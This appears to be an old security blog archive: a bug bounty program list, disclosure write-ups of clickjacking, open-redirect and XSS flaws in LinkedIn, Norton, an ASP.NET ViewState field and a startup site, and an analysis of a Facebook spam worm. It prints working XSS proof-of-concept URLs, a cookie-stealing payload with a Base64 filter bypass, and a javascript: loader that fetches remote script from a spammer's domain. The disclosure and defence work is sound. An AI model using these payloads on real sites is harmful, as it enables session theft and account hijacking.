Thursday, September 20, 2012

List of Bug Bounty Programs

Bug bounty programs are a hot topic these days: well-known companies like Google, Facebook and Mozilla are paying for finding vulnerabilities in their web servers, products, services or some associated applications. Here is a list for all the security researchers and bug hunters to target. All the best :)

Bug Bounty Websites for Web Application Vulnerability

Mozilla
security@mozilla.org
http://www.mozilla.org/security
http://www.mozilla.org/projects/security/security-bugs-policy.html
http://www.mozilla.org/security/announce

Google
security@google.com
https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2

Facebook
http://www.facebook.com/whitehat/bounty

Paypal
sitesecurity@paypal.com
https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues

Etsy
security-reports@etsy.com
http://www.etsy.com/help/article/2463

Wordpress
http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html

Commonsware
http://commonsware.com/bounty.html

CCBill
http://www.ccbill.com/developers/security/vulnerability-reward-program.php
http://www.ccbill.com/developers/security/rewards.php

Vark
http://www.vark.com

Windthorstisd
http://www.windthorstisd.net/BugReport.cfm


Bug Bounty Websites for Products Vulnerability

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/security/known-vulnerabilities/firefox.html

Google Chrome
http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program

Zero Day Initiative
http://www.zerodayinitiative.com

Barracuda
bugbounty@barracuda.com
http://www.barracudalabs.com/bugbounty
http://www.barracudalabs.com/bugbounty/halloffame.html

Artifex Software
http://www.ghostscript.com/Bug_bounty_program.html

Hex Rays
http://www.hex-rays.com/bugbounty.shtml

Ardour
http://ardour.org/bugbounty

Piwik
http://piwik.org/security


Hall of Fame & Responsible Disclosure Websites (No Bounties)

Microsoft

http://technet.microsoft.com/en-us/security/cc308589
http://technet.microsoft.com/en-us/security/cc308575
http://technet.microsoft.com/en-us/security/cc261624
http://www.microsoft.com/security/msrc/default.aspx
http://technet.microsoft.com/en-us/security/ff852094.aspx

Apple
product-security@apple.com
http://support.apple.com/kb/HT1318
https://ssl.apple.com/support/security/

Adobe
http://www.adobe.com/support/security/bulletins/securityacknowledgments.html
http://www.adobe.com/support/security/alertus.html

IBM
http://www-03.ibm.com/security/secure-engineering/report.html

Twitter
https://twitter.com/about/security
http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#
https://support.twitter.com/forms

Dropbox
security@dropbox.com
https://www.dropbox.com/security
https://www.dropbox.com/special_thanks

Yahoo
security@yahoo-inc.com

http://security.yahoo.com/article.html;_ylc=X3oDMTFwMGI4cDJnBF9TAzU2NTAwMDAwMgRhaWQDMjAwNjEyMDUwMQRjbmFtZQNZb3VyIFNlY3VyaXR5IG9uIFlhaG9vIQ--?aid=2006120501

Cisco
http://tools.cisco.com/security/center/home.x#~alerts

Moodle
http://moodle.org/security

Drupal
http://drupal.org/security-team

Oracle
http://www.oracle.com/us/support/assurance/reporting/index.html

Symantec
http://www.symantec.com/security

Ebay
http://pages.ebay.com/securitycenter/Researchers.html

Twilio
http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html

37 Signals
http://37signals.com/security-response

Salesforce
http://www.salesforce.com/company/privacy/disclosure.jsp

Reddit
http://code.reddit.com/wiki/help/whitehat

Github
http://help.github.com/responsible-disclosure/

Ifixit
http://www.ifixit.com/Info/responsible_disclosure

Constant Contact
http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp

Zeggio
http://www.zeggio.com

Simplify
http://simplify-llc.com/simplify-security.html

Team Unify
http://www.teamunify.com/__corp__/security.php

Skoodat
http://www.skoodat.com/Security

Relaso
http://relaso.com/disclosure

Moduscsr
http://www.moduscsr.com/security_statement.php

Cloudnetz
http://cloudnetz.com/Legal/vulnerability-testing-policy.html

Emptrust
http://www.emptrust.com/Security.aspx

Apriva
http://www.apriva.com/security

Amazon
http://aws.amazon.com/security/vulnerability-reporting

SquareUp
https://squareup.com/security/levels

G-Sec
http://www.g-sec.lu/responsible.disclosure.policy.html

Xen
http://www.xen.org/projects/security_vulnerability_process.html

Engine Yard
http://www.engineyard.com/legal/responsible-disclosure-policy

Lastpass
https://lastpass.com/support_security.php

RedHat
https://access.redhat.com/knowledge/articles/66234

Acquia
https://www.acquia.com/how-report-security-issue

Mahara
security@mahara.org
https://wiki.mahara.org/index.php/Security


Zynga
security@zynga.com
http://company.zynga.com/security/whitehats

Risk.io
https://www.risk.io/security

Opera
http://www.opera.com/security/policy
https://bugs.opera.com/wizarddesktop
http://my.opera.com/securitygroup/blog/2013/04/05/thanks-to-the-researchers

Owncloud
http://owncloud.org/security/policy
http://owncloud.org/security/hall-of-fame

Scorpion Soft
security@scorpionsoft.com
http://www.scorpionsoft.com/company/disclosurepolicy


Norada
http://norada.com/norada/crm/security_response

Cpaperless
http://www.cpaperless.com/securitystatement.aspx

Wizehive
http://www.wizehive.com/security
http://www.wizehive.com/special_thanks.html

Tuenti
http://corporate.tuenti.com/en/dev/hall-of-fame

Nokia Siemens
http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure

Sound Cloud
http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure

HTC
security@htc.com

http://www.htc.com/www/terms/product-security

Neohapsis
http://www.neohapsis.com/disclosure.php

Nokia
security-alert@nokia.com
http://www.nokia.com/global/security/security
http://www.nokia.com/global/security/acknowledgements


BlackBerry
secure@blackberry.com
https://www.blackberry.com/profile/?eventId=8322
http://us.blackberry.com/business/topics/security/incident-response-team/collaborations.html

Heroku
security@heroku.com
https://policy.heroku.com/security

Chargify
security@chargify.com
https://chargify.com/security

Zendesk
security@zendesk.com
http://www.zendesk.com/company/responsible-disclosure-policy

Lookout
security@lookout.com
https://www.lookout.com/responsible-disclosure

Puppetlabs
http://puppetlabs.com/security

Saturday, September 15, 2012

Linkedin's Clickjacking & Open Url Redirection Vulnerabilities


# Vulnerability Title: Secondary Email Addition & Deletion Via Click Jacking in Linkedin
# Website Link:  [Tried on Indian version]
# Found on: 06/08/2012
# Author:  Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 07/08/2012
# Status: Fixed
# Patched On: 10/09/2012
# Public Release: 15/09/2012



I found clickjacking and open URL redirection vulnerabilities on the LinkedIn website on 6th and 7th August 2012.



Summary

A clickjacking vulnerability existed on LinkedIn that allowed an attacker to add or delete a secondary email, and also to make an existing secondary email the primary email, by redressing the manage email page.


Details

The LinkedIn manage email page (a total of 1 page) lacked both the X-Frame-Options response header and frame-busting JavaScript measures to prevent framing of the page, so the manage email page could be redressed to 'click-jack' LinkedIn users. The vulnerable URL is given below, along with the proof-of-concept screenshots.


1. Click Jacking Vulnerable Url:
https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1


Click Jacking Vulnerability POC Screenshots:


The redressed editor page with the frame opacity set to 0, so it is invisible to the user. As the user drags the computer into the trash bin and clicks the Go button, a new secondary email is added to the LinkedIn user's account.



With the frame's opacity set to 0.5 you can clearly see the redressed page and all the background. The computer is actually a text area that contains the attacker's email address, which is selected by default along with the computer image (using JavaScript). When the LinkedIn user drags the computer, he actually drags the attacker's email address into the add secondary email address field, and when he clicks the Go button, he actually clicks the redressed add email address button, so the attacker's email is successfully added to the LinkedIn user's account.




Secondary email added successfully to the LinkedIn user's account.




No X-Frame-Options in the server's response header.



LinkedIn addressed the vulnerability by adding the X-Frame-Options header, set to SAMEORIGIN, on this page.
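
The header check behind the last two screenshots can be automated. The following is an added example, not part of the original post and not LinkedIn's code: it classifies a response's anti-framing protection, covering both X-Frame-Options and the CSP frame-ancestors directive that browsers prefer when it is present. The header sets are constructed.

```javascript
// Added example, not LinkedIn's code: decide whether a response's headers
// stop other origins from framing the page.

// Return the source list of the frame-ancestors directive in one CSP policy,
// or null when the policy has no such directive.
function frameAncestors(policy) {
  for (const directive of policy.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// A source list still allows framing from anywhere when it contains "*" or a
// bare scheme such as "https:".
function allowsAnyOrigin(sources) {
  return sources.some((s) => s === '*' || /^[a-z][a-z0-9+.-]*:$/.test(s));
}

function framingProtection(headers) {
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value);
  }

  // One header value may carry several comma-separated policies. All of them
  // are enforced, so a single restrictive frame-ancestors list is enough.
  const lists = (h['content-security-policy'] || '')
    .split(',')
    .map((policy) => frameAncestors(policy))
    .filter((sources) => sources !== null);
  if (lists.length > 0) {
    // When frame-ancestors is present, browsers ignore X-Frame-Options.
    const restrictive = lists.some((sources) => !allowsAnyOrigin(sources));
    return {
      protected: restrictive,
      via: 'frame-ancestors',
      detail: restrictive ? 'restricted source list' : 'source list allows any origin',
    };
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { protected: true, via: 'x-frame-options', detail: xfo };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    return {
      protected: false,
      via: 'x-frame-options',
      detail: 'ALLOW-FROM is obsolete and ignored by current browsers',
    };
  }
  return {
    protected: false,
    via: 'none',
    detail: xfo ? 'unrecognised X-Frame-Options value' : 'no anti-framing header',
  };
}

// Constructed header sets mirroring the page before and after the fix.
const BEFORE_FIX = { 'Content-Type': 'text/html; charset=UTF-8' };
const AFTER_FIX = { 'Content-Type': 'text/html; charset=UTF-8', 'X-Frame-Options': 'SAMEORIGIN' };

console.log('before fix:', framingProtection(BEFORE_FIX));
console.log('after fix: ', framingProtection(AFTER_FIX));
```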




# Vulnerability Title: Open Url Redirection in Linkedin
# Website Link:  [Tried on Indian version]
# Found on: 05/08/2012
# Author:  Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 06/08/2012
# Status: Fixed
# Patched On: 07/09/2012
# Public Release: 15/09/2012



Summary

An open URL redirection vulnerability allowed an attacker to redirect any LinkedIn user to any malicious website. The vulnerable URL is given below, along with the proof-of-concept video.


Original Open Url Redirection Vulnerable Url:




Crafted Open Url Redirection Vulnerable Url:
https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in





Open Url Redirection Vulnerability POC Video:

 


Impact of Vulnerability:

The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.

The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.
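
On the server side, the defence is to validate the callback value before redirecting. The following is an added example, not part of the original post and not LinkedIn's code: it resolves the callback path segment against a trusted base and only follows it when the resulting origin is on an allow-list. TRUSTED_BASE, ALLOWED_ORIGINS and the function names are assumptions made for the illustration.

```javascript
// Added example, not LinkedIn's code. TRUSTED_BASE and ALLOWED_ORIGINS are
// placeholder values for the site that owns the redirect endpoint.
const TRUSTED_BASE = 'https://help.example.test/';
const ALLOWED_ORIGINS = new Set([
  'https://help.example.test',
  'https://www.example.test',
]);

// Validate one percent-encoded callback value. Returns the URL to redirect
// to, or TRUSTED_BASE when the value is not acceptable.
function resolveCallback(rawSegment) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawSegment);
  } catch (err) {
    return TRUSTED_BASE; // malformed percent-encoding
  }

  let target;
  try {
    // Resolving against the trusted base lets the URL parser, not string
    // matching, decide which host the value really points at. This covers
    // relative paths, protocol-relative "//host" and "/\host" forms.
    target = new URL(decoded, TRUSTED_BASE);
  } catch (err) {
    return TRUSTED_BASE;
  }

  // "https://trusted@other-host/" parses with other-host as the host; the
  // origin check below already rejects it, and userinfo is never needed.
  if (target.username || target.password) return TRUSTED_BASE;

  // Non-http(s) schemes such as javascript: have the opaque origin "null".
  if (!ALLOWED_ORIGINS.has(target.origin)) return TRUSTED_BASE;

  return target.href;
}

// Pull the callback value out of a path shaped like the one in this post:
// /app/utils/log_error/et/0/ec/7/callback/<encoded URL>
function redirectTarget(pathname) {
  const marker = '/callback/';
  const at = pathname.indexOf(marker);
  if (at === -1) return TRUSTED_BASE;
  return resolveCallback(pathname.slice(at + marker.length));
}

// The crafted path from this post, and a constructed legitimate one.
const CRAFTED = '/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in';
const LEGITIMATE = '/app/utils/log_error/et/0/ec/7/callback/%2Fapp%2Fhome';

console.log(redirectTarget(CRAFTED));
console.log(redirectTarget(LEGITIMATE));
```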


Special Thanks to AMol NAik, Sandeep Kamble and all G4H members :)

Tuesday, September 11, 2012

Stored XSS Via Viewstate

While researching, I found that stored XSS is possible via the ViewState parameter even when the ViewState MAC is encrypted. The actual cause of this vulnerability is that the ViewState parameter's value is not properly decoded on the server side, so any XSS payload in this parameter will be executed, and if there is a filter it can be bypassed by converting the XSS payload to Base64.



The steps to execute this attack are as follows:


1. First, enter any random data in the login page of any ASPX application and submit it.


2. Intercept the submitted request using Burp proxy (in case there is any client-side validation), then modify the actual ViewState parameter as shown below.

__VIEWSTATE=oJ8hAgVek8ugvqZtQ8vy9baHA1JCMeiHO0LxTIPJT0HfnQeGqLUkBqqp%2Fn%2FNhlfxnOzTZMuhKC2wyoCSHbo9pLsXD3kA8Y9fRx%2F1c8HvBHZnz3B4VkL6%2FkzBmGhZr8vEI7eTwScjrz1skp0cOJK%2Fr1dNP3Umh0jaS%2FyBkAH2Ikan9iMQBtmaLmy6m0%2BFFwA1fGgBgk60iYonO5182BdA%2FsZ8pdZnaDRPpY1q3RORFbbZ2WfZKsYhviogwsPldBOSLyOVrS9kRwU4DCDK5uE5RkgEU7ggZmxaOtSfbicezf%2BttQxsRysfMRmK%2F94r63f%2BsQxKrM2udYbpT0s%2FWiUDPmnB50oIltm1FHGm%2BYLu0PgL9RTP

to __VIEWSTATE=<scripts>alert(document.cookie)</script> in the intercepted request.

The XSS payload <scripts>alert(document.cookie)</script> can also be converted to Base64: Jmx0O3NjcmlwdHMmZ3Q7YWxlcnQoZG9jdW1lbnQuY29va2llKSZsdDsvc2NyaXB0Jmd0Ow==



3. Now forward the request using the Burp web proxy.


4. The JavaScript payload will execute on the client side: because the Base64 value in the ViewState parameter is not properly decoded on the server side, the malicious XSS payload is not sanitized there, and if the HttpOnly cookie attribute is not implemented the attacker can get all the authentication session cookies of the victim.


Or


5. Using the Burp web proxy we were able to inject the XSS payload, and it executed successfully after we modified and forwarded the intercepted request. The interesting thing is that once this payload had executed through the vulnerable ViewState parameter, it was stored on the server side, and the XSS-vulnerable page redirected to an error page with a different URL. We then copied this error page URL and opened it in another browser. Because the XSS payload is stored on the server side, it executed again and again. So the same attack can now be carried out without any web proxy like Burp, since the malicious XSS payload is stored on the server side and can be reused through the error page URL that was generated after the payload executed via the Burp web proxy.



Malicious Url with Stored XSS Payload:

https://vulnerablesite.com/Error.aspx?parameter=vKJp31W6plKC1+MfxM3z/K6F3rbyiQeRCXHy/YbkgoBg94PMC17/UXcJIpNI9B4syvRRcsKLAdRrV3GAD9FdNYPMbeGuWK4d+PxU2rrWZJ3B8Szg283u9f71W7gw6CmRUfNG0ixyGFVsvsDAx8UEHVZ6LEfXo49SclUuUOruiHmdF99v7PtOAwd4aGDBSTB3dQX3DfgxZSr3Oiwkuf627ni0IWPU74Fqo0XTyJSXLT18H56LNeoG2F8G3CqsofnbJaMZnYD4Evu445EMpAJQZ+R9n0JV0uXHLVfh+ERAl+snQMi+CgAvv6YPWl5ygPJ45s+NLdKZXH8lkhlx2CM33dCi2AbBwci3yOAHpOFakr+Qa0V5WV8hA/b5gFcWK5WN3h0qD4zq+YqCPfMb+3V1jd86+yD5MGYLfsgUv7X8KZ8obDVRIFslWrXApYF7Nz1lDOC8PkLmulHs193yLchYDKM/Ie2uckvLGxcKflcY3RfTiQMLIDb99Z2Yp3F84VT3t0PqVa6hu37pvSj1ROuRRHsQLDCAnIizlVvfffaDfnhkLwMG5HSqac9bwp5yZX2MeZ07AIe64a/TZwcvicZsMZlI/jJ8Ul8CMIjGbihGO93E/53tnqAjHkk0Lv2jAjrsK83Q+m0yeJnvT5S3dQkVvqccfsO9DZk/i3I4vAB9y9qYCo4j3JzzAeMoydbQ20JOugn0BXPGyYtxPkih4qkYLwMjB2Yltoxj24hOCez9cGelxFI1S8iO0lnNEdasKWpFE1cE3dUcJf5SeJR/tgkAR0kU+M0Vby7SWG+Umu/8/PVXyd4BqXtJJqfi5nz2Eh94o5/kZoPjGHWDvGNuzLVCqloL3qgIxva+EqjHUzk7U17DFa34HxhcvGLUzNNzYnJhll/n4Ao1BhrTv2dIhuyeZXjEuwbA0S6YN13s3/9p6GyEvraIVSBSIPZtxXcfU/PLP4YUehqr/6R3/PWh5So4y4DlvyMepPeVd0OLnvDq+OJ3BbqhUxSDZRlJhQA3sedE+YsJ9lQFUKLUb2fBqLqyKzMDwikf0tmB5q/BOEOi5GEW+IaYVhSXJXJxtoTcpHY21ovviuZp85cXYCUqqbp044uCLMQqtqZtyxyGkL/BVY7+9pjiQrr+g8OBhpNjLfthkWVoptz/WcoRVHY7X5wZBp==



Impact:

Client-side code (like JavaScript) can be injected into the web application, which is then returned to the user's browser. This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.



Recommendation:

User inputs must be validated and filtered before being returned as part of the HTML code of a page. Don't rely on this security mechanism to protect against Cross-Site Scripting and SQL injection attacks. Make sure that proper input validation is built into web applications.

Monday, December 27, 2010

XSS & CSRF Vulnerabilities on Area Startup Website

Hi guys, I found major XSS and CSRF vulnerabilities on the Area Startup website while I was just searching for some IT firms' details :P and the site is still vulnerable, so I have submitted it to the xssed.com vulnerability database. I hope they will fix it soon :D



Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

Cross-site request forgeries (CSRF, sometimes called XSRF) are a simple attack that has huge impacts on Web application security.

GET-based CSRF (or blind redirects) is simple with XSS-Proxy. The attacker enters the destination into the “fetch document” admin form and the victim will go to the URL, determine that it can’t read the contents, and recover back to where the attacker can perform other actions.

POST-based CSRF is also possible, but requires some JavaScript (via the eval admin form) to perform the attack. The JavaScript could perform a POST-based CSRF if entered in the XSS-Proxy eval admin form (this can be entered as one large command or as multiple eval submissions).



Proof of Concept

Vulnerable Link 1:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&sa=Search#842


Screenshot 1:


Vulnerable Link 2:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28%27This%20Site%20is%20XSS%20Vulnerable%27%29%3C/script%3E&sa=Search#242


Screenshot 2:



Vulnerable Link 3:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ciframe%20src=http://xssed.com%3E&sa=Search#242


Screenshot 3:



Vulnerable Link 4:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%28This%20Site%20is%20XSS%20Vulnerable%3C/h1%3E%3C/marquee%3E&sa=Search#243


Screenshot 4:



Vulnerable Link 5:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ca%20href=%27search?searchterm=%3Cb%3EJust%20Fond%20Out%3C/b%3E%27%3EThis%20Site%20is%20XSS%20Vulnerable%3C/a%3E&sa=Search#243


Screenshot 5:


 Video:

Friday, December 24, 2010

Symantec Norton Website XSS Vulnerable

Hi guys, two weeks back I found that the website of information security giant Symantec Norton had a few XSS vulnerabilities. As of now they have fixed their site, so I am disclosing the issue :)


Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
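
The unsafe echo described above, next to its corrected form, as an added example that is not part of the original posts and is not code from any of the affected sites. It also illustrates the recommendation in the ViewState post to filter input before returning it in a page's HTML. The page template, host name and function names are assumptions; the sample request reuses the q value from the Area Startup post.

```javascript
// Added example, not code from any site named on this page.

// Encode the five characters that let a value break out of HTML text or a
// quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical search page that echoes the q parameter twice: inside an
// attribute value and inside element text. With encode=false it reproduces
// the reflected-XSS pattern; with encode=true the value is encoded first.
function searchPage(requestUrl, encode) {
  // site.example.test is a placeholder base used only to parse the URL.
  const q = new URL(requestUrl, 'http://site.example.test').searchParams.get('q') || '';
  const shown = encode ? escapeHtml(q) : q;
  return (
    '<form action="/search"><input name="q" value="' + shown + '"></form>' +
    '<p>Results for ' + shown + '</p>'
  );
}

// Count the tags a browser would see in the markup.
function countTags(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || []).length;
}

// A request injects markup when the page gains tags compared with the same
// page rendered for a harmless search term.
function injectsMarkup(requestUrl, encode) {
  const baseline = countTags(searchPage('/search?q=firewall', encode));
  return countTags(searchPage(requestUrl, encode)) !== baseline;
}

// The q value from the first Area Startup proof-of-concept link, on a
// shortened, constructed request path.
const SAMPLE_REQUEST =
  '/search?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&sa=Search';

console.log('unencoded echo injects markup:', injectsMarkup(SAMPLE_REQUEST, false));
console.log('encoded echo injects markup:  ', injectsMarkup(SAMPLE_REQUEST, true));
console.log(searchPage(SAMPLE_REQUEST, true));
```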


Proof of Concept

Vulnerable Link 1:
https://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Jq23M7YG4pjMHzwGYtlDfhdq1ZYF22vswwCBfgSGGz0k5FrgMHF9!1505726402!1291573284101

or the following code can be used in the search box or input box :

<script>alert('xss')</script>

  Screenshot 1:


 Vulnerable Link 2:
http://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Q72nM7hHJ18nVR9GQVNT3Bz01whgMYMNGSLT1H2nyYDtwwChvs22!1505726402!1291573991721

or the following code can be used in the search box or input box :
  
<script>alert('xss')</script>
 
Screenshot 2:

Monday, December 13, 2010

Reverse Engineering Videos

Reverse Engineering & Related Videos


How-I-learned-Reverse-Engineering-With-Storm-(RECON-2008)
http://videos.securitytube.net/How-I-learned-Reverse-Engineering-With-Storm-(RECON-2008).flv


Reverse Engineering 101 ( Using IDA to break password protections )
http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20IDA%20to%20break%20password%20protections%20).mp4


Reverse Engineering 101 ( Using IDA to break password protections )_controller
http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20IDA%20to%20break%20password%20protections%20)_controller.swf


Reverse Engineering 101 ( Using a Hex Editor to Find Passwords )
http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20a%20Hex%20Editor%20to%20Find%20Passwords%20).mp4


Reverse Engineering and Software Cracking Demo
http://videos.securitytube.net/Reverse-Engineering-Dynamic-Languages-(Recon-2008).flv


Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)
http://videos.securitytube.net/Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-).mp4


Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)_controller
http://videos.securitytube.net/Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)_controller.swf


Reverse-Engineering-Dynamic-Languages-(Recon-2008)
http://videos.securitytube.net/Reverse-Engineering-Dynamic-Languages-(Recon-2008).flv


Reverse-Engineering-Network-Utilities-Using-Wireshark
http://videos.securitytube.net/Reverse-Engineering-Network-Utilities-Using-Wireshark.mp4


Reverse-Engineering-a-Software-Install-Process
http://videos.securitytube.net/Reverse-Engineering-a-Software-Install-Process.mp4


Reverse-Engineering-over-Acrobat-Reader-using-Immunity-Debugger-(RECON)
http://videos.securitytube.net/Reverse-Engineering-over-Acrobat-Reader-using-Immunity-Debugger-(RECON).flv


Reverse-Engineering-the-Storm-Worm
http://videos.securitytube.net/Reverse-Engineering-the-Storm-Worm.flv


Applied-Reverse-Engineering-on-OS-X-(Recon-2008)
http://videos.securitytube.net/Applied-Reverse-Engineering-on-OS-X-(Recon-2008).flv


Reverse-DNS-Lookup-with-DIG
http://videos.securitytube.net/Reverse-DNS-Lookup-with-DIG.mp4


Reverse-DNS-Lookup-with-DIG_controller
http://videos.securitytube.net/Reverse-DNS-Lookup-with-DIG_controller.swf

Security Videos Collection

Hello everybody, I want to share some of my favorite security-related video collections. I am also giving direct, resumable download links for all those videos so that everybody can download them easily. I hope it will be helpful for everybody to learn from them. Full credit goes to the real owners of the videos and to the sites where I found them.




Malware Analysis & Related Videos


Helios-Malware-Detection-Demo

http://videos.securitytube.net/Helios-Malware-Detection-Demo.swf



Helios-Malware-Detection-Demo_controller

http://videos.securitytube.net/Helios-Malware-Detection-Demo_controller.swf


Malware-Unpacking-in-OllyDbg
http://videos.securitytube.net/Malware-Unpacking-in-OllyDbg.swf


Simple-Malware-Analyzing
http://videos.securitytube.net/Simple-Malware-Analyzing.flv


Analyzing-Malicious-PDF-Documents

http://videos.securitytube.net/Analyzing-Malicious-PDF-Documents.flv


Botnets,-Ransomware,-Malware,-and-Stuff-(Brucon-2009)
http://videos.securitytube.net/Botnets,-Ransomware,-Malware,-and-Stuff-(Brucon-2009).flv


Analyze-a-Bot-Infected-Host-with-Wireshark
http://videos.securitytube.net/Analyze-a-Bot-Infected-Host-with-Wireshark.mp4


Simple-Linux-Malware-Construction-by-Netinfinity
http://videos.securitytube.net/Simple-Linux-Malware-Construction-by-Netinfinity.flv


Banking-Malware-101

http://videos.securitytube.net/Banking-Malware-101.flv

Friday, December 3, 2010

Be Alert From Malicious Scripts & Spam on Facebook

While analyzing malicious scripts and code used by crackers and spammers, I found that they are using different attack vectors and techniques to compromise innocent users' profiles and to spam using automated techniques, in which they post a comment on a user's profile or send them a new application (many times fake) to use, for example on Facebook or any other social networking profile.


If the user clicks on that posted link or uses that new application (many times fake), the user's account mostly gets compromised if the site is vulnerable to the malicious code or if it is a kind of zero-day exploit, and sometimes the innocent user's profile is bombarded with spam messages, comments, posts, ads and fake application requests. All this spam also gets posted or sent automatically to all the friends of the user's profile.


So guys, you may get a wall post from one of your friends saying that some revolving image or new theme thing is out and that you should view the link to enjoy it. The message would be like this:



Example 1:
Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/

Example 2:
Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/


When you open any of these malicious sites, they ask you to copy and paste some JavaScript code like this:



Code :
javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)
When you paste that code into the address bar of the browser tab where your Facebook account is open and press Enter, it redirects you to the malicious JavaScript at the link in the code.

That's it: you automatically start spamming all your Facebook friends' walls, and the fire keeps spreading as more and more of your friends click on that malicious code.

The malicious JavaScript code link is: http://imaginemonkeys.com/majic.js
This link again contains the same kind of code, but this time the URL in the code is different:

Code:
javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)
This time the link is: http://graphicgiants.com/majic.js
When I tried to open it directly in the browser, it blocked me from analyzing it further and showed the error message below:

Not Found 

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80
 
 
So now I knew something fishy was going on there, as the site has some kind of authentication mechanism and also has mod_security installed to block unauthorised users. To analyze it further, I opened and used that malicious code in a secure virtual testing environment with a test profile, and during the whole process I used a sniffer to see the background redirections to other URLs and malicious code. I also crawled the other URLs of that site.



I found out that whenever a user opens http://imaginemonkeys.com directly in the browser, the site redirects the user first to http://1.88.channel.facebook.com and then to the official http://facebook.com site.


While testing the URLs inside imaginemonkeys.com, I found that it has a few more links, like http://www.imaginemonkeys.com/606/, http://www.imaginemonkeys.com/majic.js etc.


